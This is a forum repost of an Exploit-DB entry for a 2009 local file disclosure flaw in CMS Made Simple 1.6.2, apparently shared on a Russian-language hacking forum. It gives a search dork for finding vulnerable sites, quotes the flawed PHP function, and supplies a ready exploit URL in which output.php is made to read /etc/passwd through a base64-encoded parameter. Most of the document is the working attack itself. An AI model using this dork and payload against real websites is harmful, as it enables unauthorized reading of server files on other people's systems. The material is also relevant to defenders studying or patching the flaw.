Exploit CMS Made Simple 1.6.2 - Local File Disclosure

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
9407
Проверка EDB
  1. Пройдено
Автор
IHTEAM
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
null
Дата публикации
2009-08-10
Код:
#########################################################################################
#
#         [CMS Made Simple <= 1.6.2]
#
# Class:     LFI
# Reported:     29/07/2009
# Public release: 10/08/2009
# Remote:    Yes
# DORK:      "This site is powered by CMS Made Simple version 1."
# Site:      http://www.cmsmadesimple.org/
# Download:  http://s3.amazonaws.com/cmsms/downloads/4033/cmsmadesimple-1.6.2-full.tar.gz
##########################################################################################

Vulnerability:
============================================
function GetURLContent($url) {
    $content=file_get_contents($url);
    return $content;
  }
=============================================

Exploit :
================================================================================
http://[site]/[cms_path]/modules/Printing/output.php?url=L2V0Yy9wYXNzd2Q=
================================================================================
L2V0Yy9wYXNzd2Q= <--- /etc/passwd in base64


#ihteam.net - Inclusion Hunter Team 

# milw0rm.com [2009-08-10]
 
Источник
www.exploit-db.com

Похожие темы